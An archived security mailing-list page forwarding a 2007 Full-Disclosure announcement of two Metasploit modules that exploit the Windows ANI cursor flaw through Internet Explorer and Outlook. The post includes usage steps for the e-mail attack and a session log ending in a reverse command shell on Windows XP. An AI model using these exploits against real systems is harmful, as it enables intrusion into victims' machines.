ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Metasploit vs ANI



> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf 
> Of H D Moore
> Sent: Monday, April 02, 2007 11:03 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Metasploit vs ANI
> 
> Two new exploit modules are available for version 3.0 of the 
> Metasploit 
> Framework. These modules can be obtained by using the 'Online Update' 
> feature in Windows and the 'svn update' command on Unix-like systems.
> 
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
> http://blog.metasploit.com/
> 
> The two exploits can be viewed in the svn repository at 
> metasploit.com:
> http://metasploit.com/svn/framework3/trunk/modules/exploits/wi
> ndows/browser/ani_loadimage_chunksize.rb
> http://metasploit.com/svn/framework3/trunk/modules/exploits/wi
> ndows/email/ani_loadimage_chunksize.rb
> 
> The first module exploits the ANI flaw through Internet 
> Explorer. It uses 
> multiple icon files referenced from a single HTML page. This allows 
> client-side brute forcing without resorting to javascript. 
> This module 
> will execute code on Windows 2000, Windows XP, and Windows 
> Vista using 
> the default target. As mentioned in the blog, a command shell is not 
> directly accessible on Vista, but the Meterpreter payload can 
> be used to 
> bust out of the low-privileged process :-)
> 
> The second module exploits the ANI flaw through Outlook and Outlook 
> Express. It sends a multipart MIME e-mail that contains 
> multiple icons 
> files referenced from a HTML message. This allows brute 
> forcing of the 
> correct target via the mail reader, all without any form of 
> client-side 
> scripting. To use this module, point RHOST and RPORT at a SMTP server 
> that will relay your email. Set the MAILFROM and MAILTO 
> options, select a 
> payload, launch the exploit, and wait for your payload to execute.
> 
> An example session from the e-mail based exploit module:
> 
> msf exploit(ani_loadimage_chunksize) > exploit
> [*] Started reverse handler
> [*] Connecting to SMTP server localhost:20025...
> [*] SMTP: 220 slug.metasploit.com ESMTP
> [*] SMTP: 250-slug.metasploit.com
> 250-PIPELINING
> 250-8BITMIME
> 250-AUTH LOGIN PLAIN CRAM-MD5
> 250 SIZE 0
> [*] SMTP: 250 ok
> [*] SMTP: 250 ok
> [*] Sending the message (404759 bytes)...
> [*] SMTP: 354 go ahead
> [*] SMTP: 250 ok 1175497222 qp 12648
> [*] Closing the connection...
> [*] SMTP: 221 slug.metasploit.com
> [*] Waiting for a payload session (backgrounding)...
> [*] Exploit running as background job.
> msf exploit(ani_loadimage_chunksize) > 
> 
> [*] Command shell session 1 opened (192.168.0.127:4444 -> 
> 192.168.0.127:37299)
> 
> msf exploit(ani_loadimage_chunksize) > sessions -i 1
> [*] Starting interaction with 1...
> 
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> 
> C:\program files\Outlook Express>  
> 
> Enjoy!
> 
> - The Metasploit Staff
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 



 




Copyright © Lexa Software, 1996-2009.